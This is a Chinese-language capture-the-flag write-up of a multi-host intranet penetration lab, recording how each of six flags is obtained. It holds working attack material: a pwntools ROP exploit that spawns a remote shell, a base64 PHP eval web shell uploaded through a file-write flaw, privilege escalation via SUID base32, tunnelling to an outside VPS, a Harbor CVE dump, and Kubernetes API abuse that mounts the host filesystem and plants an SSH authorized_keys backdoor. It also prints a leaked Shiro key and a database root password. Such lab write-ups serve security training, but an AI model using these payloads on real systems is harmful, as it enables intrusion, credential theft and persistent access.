春秋GeatWall

flag01

利用fscan进行扫描发现有thinkphp,利用工具扫描getshell连接拿到flag1

上传fscan在内网扫描一下内容

用ai总结了一下

IP地址	开放端口/服务	版本/系统信息	漏洞名称	风险等级	利用方式/影响	修复建议
172.28.23.26	21/FTP (vsFTPd)	vsFTPd 3.0.3 (Ubuntu)	匿名登录漏洞	中高危	可下载OASystem.zip，泄露敏感数据	禁用匿名登录，检查并删除暴露文件
	22/SSH	OpenSSH 7.2p2 Ubuntu	暂无直接漏洞	低	-	升级OpenSSH，禁用密码登录
	80/HTTP (Apache)	Apache 2.4.18	新翔OA管理系统（暴露联系方式）	中	可能存在业务逻辑漏洞	检查Web应用安全性，限制敏感信息暴露
172.28.23.33	22/SSH	OpenSSH 8.2p1 Ubuntu	暂无直接漏洞	低	-	升级OpenSSH，禁用密码登录
	8080/HTTP (SpringBoot)	智联科技ERP后台	SpringBoot Actuator堆转储泄露	高危	泄露内存数据（如数据库密码）	关闭Actuator未授权访问，修改敏感凭据
			SpringBoot Env未授权访问	高危	读取环境变量、配置信息	限制/env端点访问权限
172.28.23.17	22/SSH	OpenSSH 8.2p1 Ubuntu	暂无直接漏洞	低	-	升级OpenSSH，禁用密码登录
	80/HTTP (Apache)	Apache 2.4.41	无标题页面（需进一步测试）	待定	-	检查网站内容，确认是否存在隐藏漏洞
	8080/HTTP (ThinkPHP)	ThinkPHP 5.0.23	ThinkPHP 5.0.23远程代码执行（RCE）	严重	直接获取服务器控制权	立即升级ThinkPHP或禁用该端口

flag03

先对33分析一下，扫描一下内容

下载一下heapdump看一下内容

java -jar JDumpSpider-1.1-SNAPSHOT-full.jar C:\Users\0raN9e\Desktop\春秋云镜\heapdump

===========================================
CookieRememberMeManager(ShiroKey)
-------------
algMode = GCM, key = AZYyIgMYhG6/CzIJlvpR2g==, algName = AES

===========================================

写一个shiro内存马进去

看了一下不是root权限

/home/ops01 >ls

HashNote

下载下来分析一下

是一个pwn题，不会pwn直接用网上的脚本跑一下吧

/ >netstat -antlp

Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 0.0.0.0:59696           0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                   
tcp        0      0 172.28.23.33:58428      100.100.0.3:80          TIME_WAIT   -                   
tcp        0      0 172.28.23.33:50218      100.100.145.133:80      TIME_WAIT   -                   
tcp        0      0 172.28.23.33:46490      100.100.145.133:80      TIME_WAIT   -                   
tcp        0      0 172.28.23.33:59764      100.100.145.133:80      TIME_WAIT   -                   
tcp        0      0 172.28.23.33:53762      100.100.30.25:80        ESTABLISHED -                   
tcp        0      0 172.28.23.33:57550      100.100.145.133:80      TIME_WAIT   -                   
tcp6       0      0 :::8080                 :::*                    LISTEN      667/java            
tcp6       0      0 172.28.23.33:8080       172.28.23.17:60456      ESTABLISHED 667/java            
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)

from pwn import *
context.arch='amd64'

def add(key,data='b'):
    p.sendlineafter(b'Option:',b'1')
    p.sendlineafter(b'Key:',key)
    p.sendlineafter(b'Data:',data)

def show(key):
    p.sendlineafter(b'Option:',b'2')
    p.sendlineafter(b"Key: ",key);

def edit(key,data):
    p.sendlineafter(b'Option:',b'3')
    p.sendlineafter(b'Key:',key)
    p.sendlineafter(b'Data:',data)

def name(username):
    p.sendlineafter(b'Option:',b'4')
    p.sendlineafter(b'name:',username)


p = remote('172.28.23.33', 59696)
# p = process('./HashNote')


username=0x5dc980
stack=0x5e4fa8
ukey=b'\x30'*5+b'\x31'+b'\x44'

fake_chunk=flat({
    0:username+0x10,
    0x10:[username+0x20,len(ukey),\
        ukey,0],
    0x30:[stack,0x10]
    },filler=b'\x00')

p.sendlineafter(b'name',fake_chunk)
p.sendlineafter(b'word','freep@ssw0rd:3')

add(b'\x30'*1+b'\x31'+b'\x44',b'test')   # 126
add(b'\x30'*2+b'\x31'+b'\x44',b'test')   # 127


show(ukey)
main_ret=u64(p.read(8))-0x1e0




rdi=0x0000000000405e7c # pop rdi ; ret
rsi=0x000000000040974f # pop rsi ; ret
rdx=0x000000000053514b # pop rdx ; pop rbx ; ret
rax=0x00000000004206ba # pop rax ; ret
syscall=0x00000000004560c6 # syscall

fake_chunk=flat({
    0:username+0x20,
    0x20:[username+0x30,len(ukey),\
        ukey,0],
    0x40:[main_ret,0x100,b'/bin/sh\x00']
    },filler=b'\x00')

name(fake_chunk.ljust(0x80,b'\x00'))


payload=flat([
    rdi,username+0x50,
    rsi,0,
    rdx,0,0,
    rax,0x3b,
    syscall
    ])

p.sendlineafter(b'Option:',b'3')
p.sendlineafter(b'Key:',ukey)
p.sendline(payload)
p.sendlineafter(b'Option:',b'9')
p.interactive()

flag03: flag{6a326f94-6526-4586-8233-152d137281fd}

flag02

直接匿名登录

└─# proxychains4 ftp 172.28.23.26   
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Dynamic chain  ...  27.25.151.99:6000  ...  172.28.23.26:21  ...  OK
Connected to 172.28.23.26.
220 (vsFTPd 3.0.3)
Name (172.28.23.26:orange): anonymous
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.

ftp> dir
229 Entering Extended Passive Mode (|||53964|)
[proxychains] Dynamic chain  ...  27.25.151.99:6000  ...  172.28.23.26:53964  ...  OK
150 Here comes the directory listing.
-rw-r--r--    1 0        0         7536672 Mar 23  2024 OASystem.zip
get OASystem.zip

解压分析一下内容

<?php
/**
 * Description: PhpStorm.
 * Author: yoby
 * DateTime: 2018/12/4 18:01
 * Email:logove@qq.com
 * Copyright Yoby版权所有
 */
$img = $_POST['imgbase64'];
if (preg_match('/^(data:\s*image\/(\w+);base64,)/', $img, $result)) {
    $type = ".".$result[2];
    $path = "upload/" . date("Y-m-d") . "-" . uniqid() . $type;
}
$img =  base64_decode(str_replace($result[1], '', $img));
@file_put_contents($path, $img);
exit('{"src":"'.$path.'"}');

根目录有uploadbase64.php，会匹配data:image/<input1>;base64,<input2>，以<input1>作为文件后缀，base64_decode(<input2>）作为文件内容写入

POST /uploadbase64.php HTTP/1.1
Host: 172.28.23.26
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 76

imgbase64=data:image/php;base64,PD89YCRfR0VUWzFdYDtldmFsKCRfUE9TVFsxXSk7Pz4=

写入命令发现回显是ret=127

尝试蚁剑插件提权LD可以进行提权，修改一下.antproxy.php第31行的包含文件，加一个upload目录，然后把文件改一下，这里好像只支持GET的传参，在前端进行命令执行，为www-data

执行提权find / -perm -4000 -type f -exec ls -la {} 2>/dev/null \;

-rwsr-xr-x 1 root root 30800 Jul 12  2016 /bin/fusermount
-rwsr-xr-x 1 root root 44680 May  8  2014 /bin/ping6
-rwsr-xr-x 1 root root 40152 Jan 27  2020 /bin/mount
-rwsr-xr-x 1 root root 40128 Aug 31  2019 /bin/su
-rwsr-xr-x 1 root root 44168 May  8  2014 /bin/ping
-rwsr-xr-x 1 root root 27608 Jan 27  2020 /bin/umount
-rwsr-xr-x 1 root root 71824 Aug 31  2019 /usr/bin/chfn
-rwsr-xr-x 1 root root 39904 Aug 31  2019 /usr/bin/newgrp
-rwsr-xr-x 1 root root 75304 Aug 31  2019 /usr/bin/gpasswd
-rwsr-sr-x 1 daemon daemon 51464 Jan 15  2016 /usr/bin/at
-rwsr-xr-- 1 root stapusr 173376 Apr  3  2016 /usr/bin/staprun
-rwsr-xr-x 1 root root 39664 Mar  3  2017 /usr/bin/base32
-rwsr-xr-x 1 root root 54256 Aug 31  2019 /usr/bin/passwd
-rwsr-xr-x 1 root root 40432 Aug 31  2019 /usr/bin/chsh
-rwsr-xr-x 1 root root 136808 Jan 21  2021 /usr/bin/sudo
-rwsr-xr-- 1 root messagebus 42992 Jun 12  2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 428240 May 27  2020 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 10232 Mar 27  2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 10104 Jan  2  2016 /usr/lib/s-nail/s-nail-privsep

http://172.28.23.26/upload/.antproxy.php?1=system("base32 /flag02.txt");

flag02: flag{56d37734-5f73-447f-b1a5-a83f45549b28}

看一下ifconfig的内容发现是有两个ip的，有二层

上传fscan扫一下内容

./fscan -h 172.22.14.0/24

扫到的主要内容是

• 172.22.14.37（Linux）：

  • SSH（22端口）：OpenSSH 7.6p1
  • 2379端口（可能是 etcd）和 10250端口（可能是 Kubernetes API）

• 172.22.14.46（Linux）：

• HTTP（80端口）：运行 Harbor

需要二层代理转发

flag5

frp我这里多层代理转发一直有问题，所以我换了stowaway

在个人vps上执行

./linux_x64_admin -l 2223 -s 2223

在第一层也就是靶机入口处执行

./linux_x64_agent -c 27.25.151.99:2223 -s 2223 --reconnect 8

在第二层也就是oa系统内部

./linux_x64_agent -c 172.28.23.17:8889 -s 2223 --reconnect 8

最后走个socks 6000端口一样打(确实方便好多)

先针对172.22.14.46端口，打个cveCVE-2022-46463/harbor.py at main · 404tk/CVE-2022-46463

简单的查看了信息

python harbor.py http://172.22.14.46/ --dump harbor/secret --v2

里面存在一个run.sh还有一个flag文件，得到了flag5

flag6

下载projectadmin镜像

查看到run.sh

#!/bin/bash
sleep 1

# start
java -jar /app/ProjectAdmin-0.0.1-SNAPSHOT.jar
/usr/bin/tail -f /dev/null

找到ProjectAdmin-0.0.1-SNAPSHOT.jar然后反编译

mkdir unpacked
cd unpacked
jar -xf ../ProjectAdmin-0.0.1-SNAPSHOT.jar

可以得到数据库的信息

spring.datasource.url=jdbc:mysql://172.22.10.28:3306/projectadmin?characterEncoding=utf-8&useUnicode=true&serverTimezone=UTC
spring.datasource.username=root
spring.datasource.password=My3q1i4oZkJm3
spring.datasource.driver-class-name=com.mysql.cj.jdbc.Driver

mybatis.type-aliases-package=com.smartlink.projectadmin.entity
mybatis.mapper-locations=classpath:mybatis/mapper/*.xml

直接用用MDUT进行UDF提权拿到flag6

flag4

之后对172.22.14.37进行扫描，先上传

fscan -h 172.22.14.37 -p 1-65535

D:\ONE-FOX集成工具箱_V8.2公开版_by狐狸\gui_scan\fscan>fscan -h 172.22.14.37 -p 1-65535
┌──────────────────────────────────────────────┐
│    ___                              _        │
│   / _ \     ___  ___ _ __ __ _  ___| | __    │
│  / /_\/____/ __|/ __| '__/ _` |/ __| |/ /    │
│ / /_\\_____\__ \ (__| | | (_| | (__|   <     │
│ \____/     |___/\___|_|  \__,_|\___|_|\_\    │
└──────────────────────────────────────────────┘
      Fscan Version: 2.0.0

[2025-05-19 16:53:10] [INFO] 暴力破解线程数: 1
[2025-05-19 16:53:11] [INFO] 开始信息扫描
[2025-05-19 16:53:11] [INFO] 最终有效主机数量: 1
[2025-05-19 16:53:11] [INFO] 开始主机扫描
[2025-05-19 16:53:11] [INFO] 有效端口数量: 65535
[2025-05-19 16:53:11] [SUCCESS] 端口开放 172.22.14.37:22
[2025-05-19 16:53:11] [SUCCESS] 服务识别 172.22.14.37:22 => [ssh] 版本:7.6p1 Ubuntu 4ubuntu0.7 产品:OpenSSH 系统:Linux 信息:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_7.6p1 Ubuntu-4ubuntu0.7.]
[2025-05-19 16:54:39] [SUCCESS] 端口开放 172.22.14.37:2380
[2025-05-19 16:54:39] [SUCCESS] 端口开放 172.22.14.37:2379
[2025-05-19 16:54:49] [SUCCESS] 服务识别 172.22.14.37:2380 =>
[2025-05-19 16:54:54] [SUCCESS] 服务识别 172.22.14.37:2379 =>
[2025-05-19 16:57:10] [SUCCESS] 端口开放 172.22.14.37:6443
[2025-05-19 16:58:05] [SUCCESS] 服务识别 172.22.14.37:6443 =>

存在 Kubernetes API server 未授权

{
  "paths": [
    "/api",
    "/api/v1",
    "/apis",
    "/apis/",
    "/apis/admissionregistration.k8s.io",
    "/apis/admissionregistration.k8s.io/v1",
    "/apis/admissionregistration.k8s.io/v1beta1",
    "/apis/apiextensions.k8s.io",
    "/apis/apiextensions.k8s.io/v1",
    "/apis/apiextensions.k8s.io/v1beta1",
    "/apis/apiregistration.k8s.io",
    "/apis/apiregistration.k8s.io/v1",
    "/apis/apiregistration.k8s.io/v1beta1",
    "/apis/apps",
    "/apis/apps/v1",
    "/apis/authentication.k8s.io",
    "/apis/authentication.k8s.io/v1",
    "/apis/authentication.k8s.io/v1beta1",
    "/apis/authorization.k8s.io",
    "/apis/authorization.k8s.io/v1",
    "/apis/authorization.k8s.io/v1beta1",
    "/apis/autoscaling",
    "/apis/autoscaling/v1",
    "/apis/autoscaling/v2beta1",
    "/apis/autoscaling/v2beta2",
    "/apis/batch",
    "/apis/batch/v1",
    "/apis/batch/v1beta1",
    "/apis/certificates.k8s.io",
    "/apis/certificates.k8s.io/v1beta1",
    "/apis/coordination.k8s.io",
    "/apis/coordination.k8s.io/v1",
    "/apis/coordination.k8s.io/v1beta1",
    "/apis/events.k8s.io",
    "/apis/events.k8s.io/v1beta1",
    "/apis/extensions",
    "/apis/extensions/v1beta1",
    "/apis/networking.k8s.io",
    "/apis/networking.k8s.io/v1",
    "/apis/networking.k8s.io/v1beta1",
    "/apis/node.k8s.io",
    "/apis/node.k8s.io/v1beta1",
    "/apis/policy",
    "/apis/policy/v1beta1",
    "/apis/rbac.authorization.k8s.io",
    "/apis/rbac.authorization.k8s.io/v1",
    "/apis/rbac.authorization.k8s.io/v1beta1",
    "/apis/scheduling.k8s.io",
    "/apis/scheduling.k8s.io/v1",
    "/apis/scheduling.k8s.io/v1beta1",
    "/apis/storage.k8s.io",
    "/apis/storage.k8s.io/v1",
    "/apis/storage.k8s.io/v1beta1",
    "/healthz",
    "/healthz/autoregister-completion",
    "/healthz/etcd",
    "/healthz/log",
    "/healthz/ping",
    "/healthz/poststarthook/apiservice-openapi-controller",
    "/healthz/poststarthook/apiservice-registration-controller",
    "/healthz/poststarthook/apiservice-status-available-controller",
    "/healthz/poststarthook/bootstrap-controller",
    "/healthz/poststarthook/ca-registration",
    "/healthz/poststarthook/crd-informer-synced",
    "/healthz/poststarthook/generic-apiserver-start-informers",
    "/healthz/poststarthook/kube-apiserver-autoregistration",
    "/healthz/poststarthook/rbac/bootstrap-roles",
    "/healthz/poststarthook/scheduling/bootstrap-system-priority-classes",
    "/healthz/poststarthook/start-apiextensions-controllers",
    "/healthz/poststarthook/start-apiextensions-informers",
    "/healthz/poststarthook/start-kube-aggregator-informers",
    "/healthz/poststarthook/start-kube-apiserver-admission-initializer",
    "/livez",
    "/livez/autoregister-completion",
    "/livez/etcd",
    "/livez/log",
    "/livez/ping",
    "/livez/poststarthook/apiservice-openapi-controller",
    "/livez/poststarthook/apiservice-registration-controller",
    "/livez/poststarthook/apiservice-status-available-controller",
    "/livez/poststarthook/bootstrap-controller",
    "/livez/poststarthook/ca-registration",
    "/livez/poststarthook/crd-informer-synced",
    "/livez/poststarthook/generic-apiserver-start-informers",
    "/livez/poststarthook/kube-apiserver-autoregistration",
    "/livez/poststarthook/rbac/bootstrap-roles",
    "/livez/poststarthook/scheduling/bootstrap-system-priority-classes",
    "/livez/poststarthook/start-apiextensions-controllers",
    "/livez/poststarthook/start-apiextensions-informers",
    "/livez/poststarthook/start-kube-aggregator-informers",
    "/livez/poststarthook/start-kube-apiserver-admission-initializer",
    "/logs",
    "/metrics",
    "/openapi/v2",
    "/readyz",
    "/readyz/autoregister-completion",
    "/readyz/etcd",
    "/readyz/log",
    "/readyz/ping",
    "/readyz/poststarthook/apiservice-openapi-controller",
    "/readyz/poststarthook/apiservice-registration-controller",
    "/readyz/poststarthook/apiservice-status-available-controller",
    "/readyz/poststarthook/bootstrap-controller",
    "/readyz/poststarthook/ca-registration",
    "/readyz/poststarthook/crd-informer-synced",
    "/readyz/poststarthook/generic-apiserver-start-informers",
    "/readyz/poststarthook/kube-apiserver-autoregistration",
    "/readyz/poststarthook/rbac/bootstrap-roles",
    "/readyz/poststarthook/scheduling/bootstrap-system-priority-classes",
    "/readyz/poststarthook/start-apiextensions-controllers",
    "/readyz/poststarthook/start-apiextensions-informers",
    "/readyz/poststarthook/start-kube-aggregator-informers",
    "/readyz/poststarthook/start-kube-apiserver-admission-initializer",
    "/readyz/shutdown",
    "/version"
  ]
}

PS E:\tools> kubectl --insecure-skip-tls-verify -s https://172.22.14.37:6443/ get pods
Please enter Username: test
Please enter Password: NAME                                READY   STATUS    RESTARTS   AGE
nginx-deployment-864f8bfd6f-697jq   1/1     Running   0          61s

写一个yaml

apiVersion: apps/v1
kind: Deployment
metadata:
  name: nginx-deployment
  labels:
    app: nginx
spec:
  replicas: 1
  selector:
    matchLabels:
      app: nginx
  template:
    metadata:
      labels:
        app: nginx
    spec:
      containers:
      - name: nginx
        image: nginx:1.8
        volumeMounts:
        - mountPath: /mnt
          name: test-volume
      volumes:
      - name: test-volume
        hostPath:
          path: /

PS E:\tools> kubectl.exe --insecure-skip-tls-verify -s https://172.22.14.37:6443/ apply -f aaa.yaml
Please enter Username: test
Please enter Password: deployment.apps/nginx-deployment configured

PS E:\tools> kubectl.exe --insecure-skip-tls-verify -s https://172.22.14.37:6443/ exec -it nginx-deployment-864f8bfd6f-697jq /bin/bash
kubectl exec [POD] [COMMAND] is DEPRECATED and will be removed in a future version. Use kubectl exec [POD] -- [COMMAND] instead.
Please enter Username: test
root@nginx-deployment-864f8bfd6f-697jq:/# ls

root@nginx-deployment-864f8bfd6f-697jq:/# id
uid=0(root) gid=0(root) groups=0(root)

写个ssh进去

root@nginx-deployment-864f8bfd6f-697jq:/# echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQ................................ root@kali' > /mnt/root/.ssh/authorized_keys

root@ubuntu-k8s:~# ls -al
total 56
drwx------  8 root root 4096 Mar 17 16:32 .
drwxr-xr-x 22 root root 4096 May 19 16:21 ..
lrwxrwxrwx  1 root root    9 Mar 17 16:32 .bash_history -> /dev/null
-rw-r--r--  1 root root 3106 Apr  9  2018 .bashrc
drwx------  3 root root 4096 Jul 18  2023 .cache
drwx------  3 root root 4096 Jul 18  2023 .gnupg
drwxr-xr-x  4 root root 4096 Mar 17 15:53 .kube
drwxr-xr-x 14 root root 4096 Mar 17 15:49 metarget
-rw-------  1 root root 1136 Mar 25  2024 .mysql_history
-rw-r--r--  1 root root  295 Mar 17 16:11 nginx-deployment.yaml
drwxr-xr-x  2 root root 4096 Jul 18  2023 .pip
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-rw-r--r--  1 root root  206 May 19 16:21 .pydistutils.cfg
-rw-------  1 root root    7 Mar 17 15:47 .python_history
drwx------  2 root root 4096 Jul 18  2023 .ssh

查看一下内容得到了

root@ubuntu-k8s:~# cat .mysql_history
_HiStOrY_V2_
show\040databases;
create\040database\040flaghaha;
use\040flaghaha
DROP\040TABLE\040IF\040EXISTS\040`f1ag`;
CREATE\040TABLE\040`flag06`\040(
`id`\040int\040DEFAULT\040NULL,
\040\040`f1agggggishere`\040varchar(255)\040DEFAULT\040NULL
)\040ENGINE=MyISAM\040DEFAULT\040CHARSET=utf8;
CREATE\040TABLE\040`flag06`\040(\040`id`\040int\040DEFAULT\040NULL,\040\040\040`f1agggggishere`\040varchar(255)\040DEFAULT\040NULL\040)\040ENGINE=MyISAM\040DEFAULT\040CHARSET=utf8;
show\040tables;
drop\040table\040flag06;
DROP\040TABLE\040IF\040EXISTS\040`f1ag`;
CREATE\040TABLE\040`flag04`\040(
`id`\040int\040DEFAULT\040NULL,
\040\040`f1agggggishere`\040varchar(255)\040DEFAULT\040NULL
)\040ENGINE=MyISAM\040DEFAULT\040CHARSET=utf8;
CREATE\040TABLE\040`flag04`\040(\040`id`\040int\040DEFAULT\040NULL,\040\040\040`f1agggggishere`\040varchar(255)\040DEFAULT\040NULL\040)\040ENGINE=MyISAM\040DEFAULT\040CHARSET=utf8;
INSERT\040INTO\040`flag`\040VALUES\040(1,\040'ZmxhZ3tkYTY5YzQ1OS03ZmU1LTQ1MzUtYjhkMS0xNWZmZjQ5NmEyOWZ9Cg==');
INSERT\040INTO\040`flag04`\040VALUES\040(1,\040'ZmxhZ3tkYTY5YzQ1OS03ZmU1LTQ1MzUtYjhkMS0xNWZmZjQ5NmEyOWZ9Cg==');
exit

解码一下得到flag

flag{da69c459-7fe5-4535-b8d1-15fff496a29f}